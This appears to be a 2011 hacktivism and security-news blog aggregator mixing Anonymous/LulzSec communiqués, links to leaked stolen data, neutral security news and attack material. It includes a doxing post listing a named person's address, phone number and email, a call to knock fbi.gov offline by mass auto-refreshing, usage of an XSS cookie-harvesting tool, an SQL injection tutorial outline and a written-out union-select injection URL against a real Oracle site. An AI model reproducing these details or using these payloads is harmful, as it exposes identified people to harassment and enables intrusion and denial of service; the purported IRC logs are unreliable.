Released by Batteye.

Full CSV release: http://www.4shared.com/get/-2w4Aqc8/miss_scotland_2011.html"

http://pastebin.com/q20gQgKh

F*FBI FRIDAY III anon lulzsec antisec!

2011-07-30T22:23:00.001+05:30

_ _ __ __
__| || |__ _____ _____/ |_|__| ______ ____ ____ #Anonymous
\ __ / \__ \ / \ __\ |/ ___// __ \_/ ___\ #AntiSec
| || | / __ \| | \ | | |\___ \\ ___/\ \___ #F*
/_ ~~ _\ (____ /___| /__| |__/____ \ \___ \ \___ | #FBI
|_||_| \/ \/ \/ \/ \/ #FRIDAY

/*******************************************************************************
*** F* FBI FRIDAY III: ManTech Mayhem ***
*******************************************************************************/

Ahoy thar,

Today is Friday and we will be following the tradition of humiliating our friends
from the FBI once again. This time we hit one of their biggest contractors for
cyber security: Mantech International Corporation.

http://pastebin.com/aBFLzP8g

AnonAustria

2011-07-30T22:20:00.000+05:30

AnonAustria Press Release - 2011-07-28 19:50

AnonAustria dissociates himself from current events concerning http://www.gruene.at.

It is not however exclude the possibility that one or more members of AnonAustria were involved in this action. This action was neither the knowledge nor carried outwith the consent of the grouping and the like will not be tolerated within the collective.

It is the nature of the anonymous collective, that any person at any time designate as "Anonymous" and can operate under that name, which does not mean, however, thatthis single person is also in the sense of the collective.

We regret this incident and will clarify who is internally pull accountable.

http://pastebin.com/kgGE11x4

ARM ROP payload Generation !

2011-07-30T18:27:00.000+05:30

Related (download)
http://esploit.blogspot.com/2011/03/ropme.html

Exploiting JAVA 7 difficult with ASLR !

2011-07-29T21:15:00.001+05:30

Java 7 Released.Apart from the security enhancements mentioned, it looks like all modules are now protected with ASLR (Address Space Layout Randomization) so comparably better protection from JAVA based exploits ! It's a very important security enhancement and going to give some hard time to write exploits for JAVA(JDK/JRE). Needless to say, Upgrade now.Kudos to Sun/Oracle !

Joshua: (via twitter)

"Java 7 is now available. All modules have ASLR enabled, so it is no longer possible to bypass ASLR via a Java ROP. Congrats to Oracle / Sun!"

JAVA 7 Security
http://download.oracle.com/javase/7/docs/technotes/guides/security/enhancements7.html

JDK 7 Download:
http://www.oracle.com/technetwork/java/javase/downloads/java-se-jdk-7-download-432154.html

JRE 7 Download
http://www.oracle.com/technetwork/java/javase/downloads/java-se-jre-7-download-432155.html

Operation Frosty - who's Jester ?

2011-07-29T20:06:00.000+05:30

OPERATION FROSTY

Goals:
1. To determine The Jester's real identity.
2. To determine the identity of Joe Black & his relation to The Jester.

PRELIMINARY RESULTS:

The Jester -

Real name: Ryan M Berg (Most likely Michael)

Address: PO Box 1207
Berkeley, CA 94701

Twitter: https://twitter.com/#!/th3j35t3r

Other: Attends or attended Berkeley University

Ex Military

JosephKBlack -

Real name: Joseph Kristian Black

Mobile phone (not tested) : +1 402.689.8221

Email: josephkristianblack@gmail.com

Address: 6802 Pacific St
68106
NE
Omaha

Twitters: https://twitter.com/#!/JosephKBlack - Joseph K Black
https://twitter.com/#!/JosephKGreen - Joseph K Green
https://twitter.com/#!/JosephLSatan - Joseph L Satan
https://twitter.com/#!/V3MoonRockets Version 3 Moon Rockets
https://twitter.com/#!/JosicaRabbit - Josica Rabbit
https://twitter.com/#!/JoeKBlack - Joe K Black
https://twitter.com/#!/JOESEPHBLUE - Joseph Blue
https://twitter.com/#!/JosephSWhite - Joseph S White
https://twitter.com/#!/JoesephPPurple - Joseph P Purple
https://twitter.com/#!/BrosephJKlack - Broseph J Klack
https://twitter.com/#!/JosephZRed - Joseph Z Red
https://twitter.com/#!/JosephKGinger - Joseph K Ginger
https://twitter.com/#!/JosephTOrange - Joseph T Orange
https://twitter.com/#!/JosephTChestnut - Joseph T Chestnut
https://twitter.com/#!/Just1AverageJOE - Just One Average Joe
https://twitter.com/#!/JosephDeSanko - Joseph De Sanko
https://twitter.com/#!/josephkgreene - Joseph K Greene
https://twitter.com/#!/JosephXPink - Joseph X Pink
(Possibly) https://twitter.com/#!/SimonSFirefly - Simon S Firefly
And a couple more, as well as Joseph Orange & Joseph Yellow.

Facebook: http://www.facebook.com/joeblackethicalhacker

Other: Possibly Ex military

Both are management @ Black & Berg Security Consulting LLC

Facebook: http://www.facebook.com/blackandberg

I believe they are both /b/rothers...

http://pastebin.com/qnQYF64s

wrong man arrested in LulzSec investigation?

2011-07-29T00:59:00.001+05:30

Topiary: did police arrest the wrong man in LulzSec investigation? | Naked Security: "Since the British police arrested a teenager yesterday in connection with the hacktivist activities of LulzSec and Anonymous, I've been asked, time and time again, the same question:

Have the cops got the right man?
Have they arrested the 'real' Topiary?"

http://nakedsecurity.sophos.com/2011/07/28/topiary-have-the-police-arrested-the-right-man/

http://www.dailytech.com/Exclusive+British+Police+Duped+by+LulzSec+Into+Arresting+the+Wrong+Guy/article22280.htm

http://pastebin.com/JRy1m3p4

Defending botnet servers methods used by hackers !

2011-07-29T00:53:00.001+05:30

How Criminals Defend Their Rogue Networks | abuse.ch: "It is common that cybercriminals are hosting their stuff in rogue networks (renting out so-called Bulletproof hosted servers). Many of you may remember the year 2008, when a well known Bulletproof hoster named McColo was knocked offline. We can say that this nearly was a historical moment in the history of the world wide web, where the Internet community clearly showed that they didn’t want to tolerate Cybercrime any longer. The McColo takedown was the beginning of a series of takedowns initiated by security researchers, law enforcement agencies and volunteers; In 2010, the well known Russian based Bulletproof hoster Troyak was cut off from the Internet, followed by the takedown of Group Vertical."

http://www.abuse.ch/?p=3387

XSS Harvest Pentest Tool

2011-07-28T23:42:00.001+05:30

Usage:

./xss-harvest.pl -l [-p Port] [-r Redress the victims browser]

Start with (-l) and point your victims at http:///i to be "infected".
e.g. inject something like this into a vulnerable page -

Optionally run ./xss-harvest.pl with the (-r) parameter to redress the victims browser to a different page on the same site (such as a login form) after successful infection.
e.g. ./xss-harvest.pl -l -r http:///login.php

For persistent XSS (infection persists across subsequent pages on the same domain), you must use the redress feature, even if you intend to display the original vulnerable page.

Download:

https://docs.google.com/uc?id=0B-yhjV3y1-D2ZmVlMmUxMWUtNjJhYy00Njc5LWI0M2ItZTMwMmIxMTQ0NTNh&export=download&hl=en_US

Video:

http://www.youtube.com/watch?v=dUsCSiXcSKw

http://www.0x90.co.uk/2011/07/harvesting-cross-site-scripting-xss.html

The SQL space game !

2011-07-28T23:35:00.000+05:30

The Schemaverse: "Inspired by mySQLgame and my own mild obsession with databases, this is a multiplayer space game which you play through close interaction with the database. Control your fleet manually or write AI so they control themselves. Play by writing SQL queries in your favourite client or write your own interface.

Our main database will now be repurposed as the DEFCON database until the middle of August. Come play on it to help me tweak the settings for a 3 day round"

https://github.com/Abstrct/Schemaverse/wiki/how-to-play

http://schemaverse.com/

https://schemaverse.com/tw/

http://www.mysqlgame.com/

Lightweight Portable Security Linux Distro by DOD

2011-07-28T23:32:00.001+05:30

Software Protection Initiative - Lightweight Portable Security: "Lightweight Portable Security (LPS) creates a secure end node from trusted media on almost any Intel-based computer (PC or Mac). LPS boots a thin Linux operating system from a CD or USB flash stick without mounting a local hard drive. Administrator privileges are not required; nothing is installed. The ATSPI Technology Office created the LPS family to address particular use cases. LPS-Public is a safer, general-purpose solution for using web-based applications. The accredited LPS-Remote Access is only for accessing your organization's private network."

http://spi.dod.mil/docs/LPS-1.2.2_public.iso

http://spi.dod.mil/docs/LPS-1.2.2_public_iso.zip

http://spi.dod.mil/docs/lps_quick_start.pdf

http://spi.dod.mil/lipose.htm

jQuery XSS

2011-07-28T23:28:00.000+05:30

Minded Security Blog: jQuery is a Sink!: "arguments of jQuery contains some kind of tag it'll be rendered using innerHTML, resulting in a potential DOM Based Xss."

http://blog.mindedsecurity.com/2011/07/jquery-is-sink.html

Amazon S3 SpyEye

2011-07-28T23:26:00.001+05:30

Amazon S3 exploiting through SpyEye - Securelist: "One hurdle for these cybercriminals to abusing Amazon S3 is the creation of an Amazon Web Services (AWS) account. These accounts require a legitimate identity and method of payment, so it is evident that criminals are using stolen data to overcome this challenge."

http://www.securelist.com/en/blog/208193064/Amazon_S3_exploiting_through_SpyEye

The 404 Project

2011-07-28T23:24:00.001+05:30

ISC Diary | Announcing: The "404 Project": "We all know that web applications are the new firewall. However, so far we had a hard time collecting web application logs. The hard part is to balance ease of install of a sensor (without disrupting the web application), fidelity of the log information and privacy."

http://isc.sans.edu/diary.html?storyid=11272

anonymous Sabu Charles Authur IRC log !

2011-07-28T23:18:00.000+05:30

Charles Authur exposed as Charlatan - Pastebin.com: "
Conversation with Charles Arthur / One of his interns on IRC.

Premise: Charles/cronies apparently were reading my imposter (@anonymoussabu)'s twitter account and tried to make a story connecting me to the pro-terrorist statements the imposter made.

On my real account you WILL see:

anonymouSabu The Real Sabu
Anonymous is with #Oslo. We are Legion. We never forget. We never forgive. And we are sorry you have gone through this tragedy. We love you.
22 Jul Favorite Reply Delete

The Real Sabu
anonymouSabu The Real Sabu
Our respects go out to the ladies and gents in #Oslo going through this disgusting terror attempt. We are with the people of Norway #antisec
22 Jul

Here is conversation with Charles or his people:

21:31 sabu i went back and your tweets about oslo were deleted
21:32 and i see now that you have a related operation
21:55 My oslo tweets are NOT deleted
21:55 how about you look at the right twitter
21:55 instead of getting trolled
21:55 you complete imbicile
21:55 www.twitter.com/anonymousabu= mine
21:55 www.twitter.com/anonymoussabu = imposter
21:55 if you scroll back, my REAL statements on oslo are still there
21:55 and I said
21:55 we at anonymous love norway and we're sorry for what happened
21:56 and we are in solidarity etc
21:56 sabu, we covered this earlier. i went and made sure, i searhed all your 900+ tweets
21:56 why would I delete tweets of solidarity for twitter?
21:56 and btw
21:56 I have 3000 tweets
21:56 not 900
21:56 21:55 www.twitter.com/anonymousabu= mine
21:56 21:55 www.twitter.com/anonymoussabu = imposter
21:57 how about you read the right twitter you stupid f*
21:58 I'm scrolling back now
21:58 and when I find them
21:58 I'm going to expose you as a f* joke charles
21:58 i dont know who charles is, and i am not him
21:58 im sorry if ive offended you
22:01 -!- fresh_fries [Jacques@AN-613.qd5.etm8r2.IP] has quit [Quit: Audi 5000!]
22:01 hi
22:01 -!- fresh_fries: No such nick/channel

After being exposed in #reporter on irc.anonops.li as being with the Guardian, and me exposing him as Charles Arthur, et al. He quit immediately.

http://pastebin.com/GJ9Dwd9e

lulzboat lulzsec IRC chat log

2011-07-28T22:51:00.001+05:30

s*storm, marduk, lulzboat, topiary, alex, glomex, s0cket [01:29am] == Chann - Pastebin.com: "shitstorm, marduk, lulzboat, topiary, alex, glomex, s0cket

[01:29am] == Channel modes on #!sec are: +inrst
[01:29am] == Channel #!sec was created at: Sat Jul 16 23:10:58 2011
[01:29am] S0cket: Topiary, you where doing toe RFI?
[01:29am] marduk: mmm i am still not sure about this, guise.
[01:29am] alex: yeah
[01:29am] Topiary: RFI was complete yesterday, S0cket
[01:29am] Topiary: nah guys this is a good venture
[01:29am] S0cket: Ah, cool
[01:29am] marduk: Topiary: you know what you're doing i assume?
[01:29am] alex: this gonna be huge if we do it carefully
[01:29am] S0cket: Yeah we will rock the socks off them
[01:29am] Topiary: yeah marduk
[01:29am] alex: ^"
------snip----------

[01:34am] marduk: joepie is busy with normal stuff

[01:34am] S0cket: Ah thats why

[01:34am] Topiary: S0cket, Project Inception, did I not tell you about that?

[01:34am] S0cket: No tell me!

[01:34am] alex: $65k's enough for now

[01:35am] S0cket: Are we going to buy ferraris and go to ryan?

[01:35am] alex: haha

[01:35am] S0cket: Yeah we need a l33tm33t

[01:35am] Topiary: where my BitCoin gobbler takes 0.1 from every transaction and shifts it off as transaction fee/lost in verification

-----------------

[01:36am] S0cket: Winning!

[01:36am] S0cket: what we doing with the cash?

[01:36am] S0cket: for wikileaks right?

----------------

[01:37am] Topiary: so I cash out $1500 segments into PayPal

[01:37am] S0cket: and the rest into ... pot?

[01:37am] Topiary: it's spread around, yes

[01:37am] shitstorm joined the chat room.

-----------------

[01:38am] S0cket: Goto russia
[01:38am] Topiary: I have about 2 million infects
[01:38am] S0cket: We need to get a HQ in RUSSIA
[01:38am] alex: eh - russia
[01:38am] S0cket: LulzHQ
[01:38am] Topiary: I can't go faster or I will destroy the market, hence $1500 segments, and of course the original $50K as a "one time" transaction
[01:38am] S0cket: If you pay they dont fuck you.
[01:38am] Topiary: so $50K + $1.5K every day since then
[01:39am] S0cket: ... Damn
[01:39am] S0cket: Lulzmillionare?
[01:39am] Topiary: I will be reeling $45,000 a month
[01:39am] alex: jopie91 is irc op, isnt he?
[01:39am] S0cket: No that was P2A
[01:39am] alex: eh, true - confused
[01:39am] S0cket: Power2all
[01:39am] S0cket: he was fake d0xed
[01:39am] Topiary: and I named it Project Inception because we're stealing sekrits that they think are being stored in other sekrits
[01:39am] alex: sure
[01:40am] alex: this^
[01:40am] Topiary: anyway, I bought the core 15 two year's supply of VPNs/hosting
[01:40am] S0cket: neat
[01:40am] S0cket: Finally a vpn
[01:40am] alex: eh ~
[01:40am] S0cket: now i can Stealthninja alex from behind
[01:41am] marduk: Topiary: you should name everything we do.
[01:41am] marduk: no exceptions.
[01:41am] alex: right, socket
[01:41am] S0cket: Yeah
[01:41am] alex: got this fu!
[01:41am] S0cket: Can we get a Project J3st3r?
[01:41am] S0cket: Project Jetski!
[01:42am] Topiary: you mean project pay attention to washouts on wordpress?
[01:42am] S0cket: Yeah
[01:42am] S0cket: Cant we just butthurt jester?
[01:42am] S0cket: Like D0x him and make him suicide?
[01:42am] alex: god, dont talk about this jesfag - hes not worth it
[01:42am] S0cket: and get it recorded
[01:43am] Topiary: let them make irrelevant comments and DDoS tiny web servers, we will continue leeching $1500 a day
[01:43am] S0cket: True
[01:43am] marduk: there used to be a spamfilter against jester on this network
[01:43am] marduk: goodtimes.jpg
[01:43am] Topiary: anyway, none of our shit got suspended in the last week because I bought out the "clients"
[01:43am] S0cket: How about apple agian?
[01:43am] Topiary: amazing what people will - or rather, won't - do for $1000
[01:44am] Topiary: Apple is still ongoing
[01:44am] S0cket: I saw alex talking about having the IOS5 source?
[01:44am] Topiary: alex?
[01:44am] alex: whos alex?
[01:44am] S0cket: ^
[01:44am] Topiary: some guy who owned some source I hear!
[01:44am] alex is now known as not_this_alex.
[01:44am] S0cket: :3
[01:45am] S0cket: Anyways, i got a peek inside. and they have no security
[01:45am] S0cket: did a NMAP
[01:45am] S0cket: only 1 IPS
[01:45am] S0cket: if we manage to dump the stuff overnight.
[01:45am] S0cket: Mmm
[01:46am] S0cket: not_this_alex, Can you do the dumping?
[01:46am] S0cket: My hdd is still full of porn
[01:46am] not_this_alex: guys
[01:46am] S0cket: Yes alex?
[01:46am] not_this_alex: we need to crack this hash
[01:46am] Topiary: S0cket, I am storing 1.5TB of it already
[01:46am] not_this_alex is now known as lex.
[01:46am] lex is now known as alex.
[01:46am] alex: lulz
[01:46am] alex: 8bb4cdc8f511ad386e723f298c9c39
[01:46am] alex: but keep it internal
[01:46am] S0cket: Whats it?
[01:46am] S0cket: ios master password?
[01:46am] Topiary: if you guys want me to buy space for hosting, just say it, or dumping power
[01:46am] S0cket: Encryption header keys?
[01:46am] alex: lol no, but its related to something big
[01:46am] S0cket: Topiary, can you make obama wear a shoe?
----------------

[01:47am] S0cket:
[01:47am] Topiary: that being said I make $1500 a day just by saying "got some more for you" to Mr. X (because he doesn't know that you know)
[01:47am] Topiary: so he is Mr. X
[01:48am] S0cket: Yeah ok
[01:48am] S0cket: Oh hey, didnt we found that document?
[01:48am] alex: priority on that hash!
[01:48am] Topiary: document?
[01:48am] S0cket: about the Apple Tapping service?
[01:48am] alex: i will ask sabu if he comes later
[01:48am] Topiary: okay alex let me grab you some clusters
[01:48am] alex: kk
[01:48am] Topiary: we got mad clusters three days ago, gonna check if the guy has set them up properly

-----------

[01:49am] alex: -> 8bb4cdc8f511ad386e723f298c9c39
[01:50am] S0cket: Topiary, Sabu came across that document where was noted that all IOS 3 and up devices where logging LOCATION WIFI and TEXT Messages send.
[01:50am] alex: job is crackin hash - will cause epic release
[01:50am] alex: kk thy
[01:50am] S0cket: Dont release it!
[01:50am] marduk: alex: what was that... admin sql thingy at thangy?
[01:50am] alex: ^
[01:50am] S0cket: ^
[01:50am] marduk: :D~
[01:50am] Topiary: okay S0cket, I'll add that to my notes
[01:50am] S0cket: Sure
--------------

[02:09am] Lulzboat: Channel Topic: priv8 ffs | Sabu, get word to kayla | TARGET: 8bb4cdc8f511ad386e723f298c9c39

---------------

Full Log

http://pastebin.com/Cz8wpkHN

Response to Antisec on Operation PayPal !

2011-07-28T22:41:00.000+05:30

DDoS Ain't The Civil Rights Movement Ya Anonymous Morons - Pastebin.com: "A Response To Item Number 7 in a communiqué from Anonymous titled 'A message to PayPal, its customers, and our friends.'

Begin block quote from above message.

7. What the FBI needs to learn is that there is a vast difference between adding one's voice to a chorus and digital sit-in with Low Orbit Ion Cannon, and controlling a large botnet of infected computers. And yet both of these are punishable with exactly the same fine and sentence.

End block quote.

First, you are the ones that are interpreting 'the law' to allow for DDoS attacks to be legal. These cyber attacks cause real monetary damage for web sites and cause money to be spent countering these attacks. DDoS attacks are NOT the same as going to a physical location and saying that you are not going to move because you are protesting some ideal. In such cases law enforcement can arrest your a** and remove you from the premises if they deem you to be in violation of any laws. In this case you are able to make your point, attention is drawn to the situation, and you can be removed if you are violating the law. Such action within the Intertubes work differently. It's harder to find your physical location. Which is a fact Anonymous enjoys much as they dislike having to pay for their actions.

If your beliefs hold true, then you should not mind being a martyr spending 15 years in jail and having to pay a buttload in fines for DDoS'ing Paypal. After all, your ideals were violated, you took the necessary actions to lodge your protest, but law enforcement saw things differently and vanned your sorry butt. What better way to serve as a martyr for your cause than serving hard time behind bars? Many religions are willing to give their own LIFE in response to supporting their ideals. But Anonymous isn't willing to give a sorry 15 years of jail time in response for supporting their beliefs?

Your analogy between using LOIC and a botnet is ludicrous. This is saying the same thing as well, I sniped a dude using a .22 LR versus saying, I sniped a dude using a .50 BMG. Don't make stupid comparisons ya morons.

I hope for the best in your mad LOIC'ing; and subsequent vanning. In the mean time, enjoy this Looney Tunes dubstep mashup. http://www.youtube.com/watch?v=QQcccIfy7mE"

http://pastebin.com/Cz8wpkHN

Antisec operation against FBI !

2011-07-28T22:36:00.001+05:30

#OpF*TheFeds - Pastebin.com: "

#### ## ## ######## ### ###### ## ##
## ## ## ## ## ## ## ## ## ## ## ## ##
#### ######### ## ## ## ## ## ## ##
## ## ######## ## ## ###### #########
######### ## ## ######### ## ## ##
## ## ## ## ## ## ## ## ## ##
## ## ######## ## ## ###### ## ##
*============================================================================================*
Ohaidir again fair ppl of #AntiSec

We here in the ~#Bash crew have watched in awe what people can do in a 'Peaceful Protest' and now sense the 'FED'S' do not see loilc as a protest we propose this."

We will not use loilc as our weapon we will use the ppl of #AntiSec in a "True" Peaceful Protest while still delivering a DoS effect

As we have seen from LulzSec all they have to do is post a link and the site goes down form all of the traffic
and we have seen from #OpPaypal loads of ppl even just bystander's were willing to partake in it.

We propose this
Lets use this to our advantage
Lets overflow www.fbi.gov but not only just once
lets use this https://addons.mozilla.org/en-US/firefox/addon/check4change/
this is a FireFox plugin that auto refreshes a webpage
it is an easy enough #Op that the stander by's can partake in
No loilc
No hacking
Minimal amount of 1337 skills
just watch their server go down
and for the bystander's it is still strongly suggested that you use TOR found here www.torproject.org/
Simple as that
all you need to know is how to install some FireFox plugins and FireFox it's self
With everyone participating who follows or partakes in #AntiSec fbi.gov will go down.

So What Say You
Will you stand up and protest
We hope to see you there
#Op****TheFeds on
#****FBIFriday

A little bit about why we are starting this:

We currently have some fallen brothers who have become victims of the FEDs threatened with 15 years imprisonment for using loilc, last time we checked that is not a bot-net
and to us that was peaceful protest so mabey we can can make a change in our protesting simply refreshing a webpage to stay up dated on it seems like absolutely no crime to us.

http://pastebin.com/pa6sGSL7

Anon leaks CNAIPIC part 3 !

2011-07-28T22:30:00.000+05:30

CNAIPICOWNED3 - Pastebin.com: "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++_______ _______
| | \ _ \ _____ \______\
| | / /_\ \\__ \ | | \
| |__\ \_/ \/ __ \_| ` \
|_______ \_____ (____ /_______ /
\/ \/ \/ \/
////////////////////////////////////////////////////////////////////////////////////////////

+Legion of Anonymous Doom+ Release Zero\/.1+

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Heynow,

We have a really hard time going through this chasing the bad guy game yesterday, and we want to thank you for your support. Previous release was not that of enough and we experienced some problems uploading you the right size that matters 2day its around 200Mb it wont be there for too long so be quick =)"

Stay tuned 4 the next one "Consulate Voice Transmittals Remix" soon,

Heynow to all of you out there and beware of invasion!!!!

http://imgur.com/a/Y1Imb - preview images

http://imgur.com/a/4B6Mz - preview images 2

http://imgur.com/a/fP18v - preview images 3

http://www.filefactory.com/file/cc96b20/n/CNAIPICP3N.rar archive

http://pastebin.com/jYyicJ8M

SQL injection tutorial in-depth !

2011-07-28T02:13:00.000+05:30

SQL Injection Tutorial In-depth
Right......... This is in depth tutorial with pics XD on how to do SQL injection correctly.
I take it you know what SQL injection is.... The basics I mean XD you wouldn't be here otherwise would you?

Let's get a cracking.

#1.Finding vulnerable sites
#2.Finding amount of columns
#3.Getting mysql version current user
#4.Getting Databases
#5.Getting Tables
#6.Getting Columns
#7.Getting Usernames and Passwords

http://pastebin.com/bQBnkmXY

Anon leaks more CNAIPIC data !

2011-07-28T02:03:00.002+05:30

CNAIPICOWNED2 - Pastebin.com: "+Legion of Anonymous Doom+ Release Zero\/+

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Heynow,

We have to tall you that these couple of days feds were giving us a really hard time, shutting down datacentres all over EU and seting up TESURS on every single suspect they've got on file.
Thanks to Italian Police we've lost our brother networks in France and Germany. Our homeboys in county cellblock 6 confirmed search and seizure warrant by US Military Intel in Pakistan.

Today we release who knows what since we don't classify the stuff and give it to you in chaos,we aint got no time or will to organize it so it's up 2 you.

Heynow to all of you out there and beware of invasion!!!!

http://imgur.com/a/Y1Imb - preview images

http://imgur.com/a/4B6Mz - preview images 2

http://depositfiles.com/files/8n16xnndi data portion"

http://pastebin.com/3E7UPduL

Related:
Part 1
http://esploit.blogspot.com/2011/07/lulzsec-anon-hacked-homeland-security.html
Part 3
http://esploit.blogspot.com/2011/07/anon-leaks-cnaipic-part-3.html

OWASP Session Management Cheat Sheet

2011-07-28T01:43:00.001+05:30

ISC Diary | OWASP Session Management "Cheat Sheet": "Application session management (or rather the lack thereof) is still one of the most frequently exploited vulnerabilities in web apps. OWASP contributor and fellow SANS ISC Handler Raul Siles has now put together a nice OWASP cheat sheet on things to consider when designing or reviewing web application session handling."

https://www.owasp.org/index.php/Session_Management_Cheat_Sheet

http://isc.sans.edu/diary.html?storyid=11263

Index of tools foundstone

2011-07-28T01:37:00.001+05:30

intitle:index of tools - Google Search: "Index of /102057/tools/foundstone"

http://download.nai.com/tools/foundstone/

malware EXE drop technique

2011-07-28T01:20:00.001+05:30

Cisco Blog » Blog Archive » Extracting EXE Drop Malware: "One of the techniques that is commonly used by attackers is the EXE drop. Basically this technique revolves around placing an executable file within the data format in which the vulnerability takes place. Post exploitation, the payload searches for the file descriptor that is associated with the data file, copies the EXE file from it to disk, and executes the EXE file in a new process."

http://blogs.cisco.com/security/extracting-exe-drop-malware/

labs.oracle.com sql injection !

2011-07-28T00:05:00.000+05:30

This is regarding the news related to labs.oracle.com SQL injection. At first it's hard to believe and looks like another false news like this one:
http://www.thehackernews.com/2011/06/sql-injection-vulnerability-in-google.html

But that one was false results by multiple SQLi scanner (Havij,Pangolin etc.)
http://esploit.blogspot.com/2011/07/google-labs-hacked-sql-injection.html

However, searching for "hxxp://labs.oracle.com/dmp/patents.php?uid=mherlihy 'and 1 = 0 union select 1,2, table_name, 4 from information_schema.tables-- - & show = all " in Google , returns the following page(check the cache): "It is a snapshot of the page as it appeared on 4 Jul 2011 11:38:32 GMT"

http://webcache.googleusercontent.com/search?q=cache:2G2hUdOGi2sJ:labs.oracle.com/dmp/patents.php%3Fuid%3Dmherlihy'%2520and%25201%3D0%2520union%2520select%25201,2,table_name,4%2520from%2520information_schema.tables--%2520-show%3Dall+http://labs.oracle.com/dmp/patents.php%3Fuid%3Dmherlihy+'and+1+%3D+0+union+select+1,2,+table_name,+4+from+information_schema.tables--+-+%26+show+%3D+all&cd=1&hl=en&ct=clnk&gl=in&source=www.google.co.in

Also it looks like labs.oracle.com is down at this time:

http://esploit.blogspot.com/2011/07/google-labs-hacked-sql-injection.html

https://ashiyane.org/forums/showthread.php?p=215989

SQL injection for traffic cameras !

2011-07-27T22:57:00.000+05:30

"This picture is almost certainly Photoshopped, and a joke, but it's certainly a clever idea. Automatic license plate scanners become more common, why not get a SQL injection attack as a plate?" Bruce Schneier-2008

APKinspector GUI Android malware analysis tool

2011-07-27T22:38:00.001+05:30

APKinspector : the alpha release of project 6. | The Honeynet Project: "The GUI tool for static analysis of Android malware is ready for an alpha release"

https://bitbucket.org/ryanwsmith/apkinspector

http://www.honeynet.org/node/747

http://www.honeynet.org/gsoc/slot6

ModSecurity SQL injection filter bypass !

2011-07-27T22:36:00.001+05:30

ModSecurity SQL Injection Challenge: Lessons Learned - SpiderLabs Anterior: "The focus of this blog post is to provide an in-depth discussion of the Level II bypasses that were identifies during the SQLi Challenge.

Let's take a look at each bypass in-depth so that we see how the bypass was achieved and also highlight the changes made to the CRS to make them stronger."

http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html

Mozilla WebOS Boot to Gecko Coming soon

2011-07-27T22:32:00.001+05:30

Booting to the Web - mozilla.dev.platform | Google Groups: "Boot to Gecko"

https://wiki.mozilla.org/B2G

https://github.com/andreasgal/B2G

https://groups.google.com/group/mozilla.dev.platform/browse_thread/thread/7668a9d46a43e482?pli=1

50 ways to hack a website

2011-07-27T22:29:00.000+05:30

50 ways to hack a website | ESET ThreatBlog: "Well, really there are far more, but the latest study from Imperva of 10 million attacks against 30 large organizations from January to May of 2011 cites a cocktail of techniques used by would-be hackers to spot the weaknesses and exploit them. For those of us who’ve tailed a log file spinning out of control during an attack attempt, those numbers seem plausible. Over time, attacks have become slick and automated, often progressive, and adaptive, targeting the next phase based on what was found in the last."

http://blog.eset.com/2011/07/26/50-ways-to-hack-a-website

CVE-2011-2747 Picasa Remote Code Execution !

2011-07-27T22:26:00.002+05:30

Microsoft Vulnerability Research Advisory MSVR11-008: Vulnerability in Google Picasa Could Allow Remote Code Execution: "A vulnerability exists in the way that Picasa handles certain specially crafted JPEG images. An attacker could exploit this vulnerability to cause Picasa to exit unexpectedly and execute arbitrary code. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights."

http://www.microsoft.com/technet/security/advisory/msvr11-008.mspx

smiasm reverse engineering framework

2011-07-27T22:24:00.001+05:30

smiasm - reverse engineering framework - Google Project Hosting: "Miasm is a a free and open source (GPLv2) reverse engineering framework. Miasm aims at analyzing/modifying/generating binary programs. Here is a non exhausting list of features:

opening/modifying/generating PE/ELF 32/64 le/be using Elfesteem
Assembling/Disassembling ia32/ppc/arm
Representing assembly semantic using intermediate language
Emulating using jit (dynamic code analysis, unpacking, ...)
Expression simplification for automatic de-obfuscation
Graphic disassembler using Grandalf"

http://code.google.com/p/smiasm/

Hooking ReadFile MapViewOfFile

2011-07-27T22:19:00.001+05:30

TippingPoint | DVLabs | MindshaRE: Hooking ReadFile and MapViewOfFile for Vulnerability Analysis: "As Aaron mentioned in another MindshaRE here at ZDI we often get submissions containing only a fuzzed file without any analysis. When analysing those cases it is often useful to know exactly when our vulnerable program reads the bytes that have been changed in the file. This can be done using the hooking technique Aaron described earlier."

http://dvlabs.tippingpoint.com/blog/2011/07/26/hooking-readfile-and-mapviewoffile

Metasploit Bounty Exploits by corelan !

2011-07-27T22:17:00.001+05:30

Metasploit Bounty – the Good, the Bad and the Ugly | Corelan Team: "Each exploit for a vulnerability listed in the top 5 list was worth USD $500, the other 25 exploits were worth USD $100 each. The deadline to submit a functional Metasploit module, bypassing ASLR and DEP where applicable, was set to July 20th.

Sounds like fun, so I decided to give it a try and claimed one of the vulnerabilities from the top 25 list.

The bounty contest is now closed , so I decided to share my version of the “code, sweat and tears” that were required to produce a reliable exploit."

https://www.corelan.be/index.php/2011/07/27/metasploit-bounty-the-good-the-bad-and-the-ugly/

CVE-2011-0222 exploit Safari SVG

2011-07-27T22:07:00.002+05:30

exploit for CVE-2011-0222 Safari SVG Vulnerability | Abysssec Security Research: "our safari vulnerability got patched and we decide to public our windows exploit + stand alone trigger without any pop up and finally a simple ROP to DEP bypass ."

http://www.abysssec.com/files/CVE-2011-0222_WinXP_Exploit.zip

http://www.exploit-db.com/sploits/CVE-2011-0222_WinXP_Exploit.zip

Message from malware author to NOD32

2011-07-27T22:05:00.001+05:30

Come along, little doggy, come along | ESET ThreatBlog: "The most common malware technique for avoiding detection is to create loads of “fresh” variants. Actually, the component that changes so frequently is the packer – the outer layer of the malware, used by malware authors to encrypt the malware and make it harder to detect – whilst the functionality of the malicious code inside remains the same."

http://blog.eset.com/2011/07/26/come-along-little-doggy-come-along

SQLCMD OSQL tutorial

2011-07-27T22:01:00.001+05:30

Coresec.org – Information Security Blog » Hack Database Servers with SQLCMD and OSQL: "The osql utility allows you to enter Transact-SQL statements, system procedures, and script files. This utility uses ODBC to communicate with the server."

http://www.coresec.org/2011/07/27/hack-database-servers-with-sqlcmd-and-osql/

lulzsec message paypal

2011-07-27T21:56:00.001+05:30

. /$$ /$$ /$$$$$$
